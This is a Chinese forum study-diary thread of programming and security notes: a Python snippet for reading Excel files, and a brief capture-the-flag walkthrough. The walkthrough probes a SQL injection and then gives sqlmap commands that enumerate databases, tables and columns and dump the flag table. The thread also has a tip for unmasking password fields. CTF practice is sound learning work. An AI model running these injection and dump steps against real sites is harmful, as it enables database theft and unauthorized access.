马璐学习日记

Martini · 发表于 2022-1-29 02:55:51

本帖最后由 Martini 于 2022-5-19 08:38 编辑

序列解包

Martini · 发表于 2022-2-1 19:20:56

本帖最后由 Martini 于 2022-5-19 08:38 编辑

实现字符串加密解密

Martini · 发表于 2022-2-20 21:58:09

python对excel表格处理

import xlrd
workbook = xlrd.open_workbook(filename=r'C:\Users\nudnik rihe\Desktop\test.xlsx')
table = workbook.sheets()[0]
row = table.nrows
# 获取sheet中有效行数
print(row)
col = table.ncols
# 获取sheet中有效列数
print(col)
num = table.row_len(0)
# 返回该行的有效单元格长度,获取一行中有多少列数据
print(num)
table_list = table.row_values(rowx=0, start_colx=0, end_colx=None)
#获取指定行中所有的数据
# rowx表示是获取第几行的数据
# start_col表示从索引为多少开始，end_colx表示从索引为多少结束，
# end_colx为None表示结束没有限制
# 获取指定行中的数据并以列表的形式返回
print(table_list)

复制代码

Martini · 发表于 2022-3-13 15:18:56

本帖最后由 Martini 于 2022-3-13 15:21 编辑

有对话框第一时间想到是不是存在注入
输入1有返回页面
输入1'无返回值
输入1 and 1=1有返回值为数字型注入
burpsuite抓包
copy to file存为1.txt
kali执行sqlmap -r"1.txt" -p id -dbs

得到数据库为skctf
查看表名执行sqlmap -r"1.txt" -p id -D skctf --tables

得到表名为sc和fl4g
查看字段执行sqlmap -r"1.txt" -p id -D skctf -T fl4g --columns

列出字段信息执行sqlmap -r"1.txt" -p id -D skctf -T fl4g -C skctf_flag --dump

得到flag

Martini · 发表于 2022-3-21 21:53:50

本帖最后由 Martini 于 2022-5-19 08:41 编辑

Martini · 发表于 2022-3-25 10:54:56

本帖最后由 Martini 于 2022-5-19 08:41 编辑

将type里的“password”修改为“text”

		自动登录	找回密码
密码			立即注册

马璐学习日记

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源

一道有关url编码的web题

本帖子中包含更多资源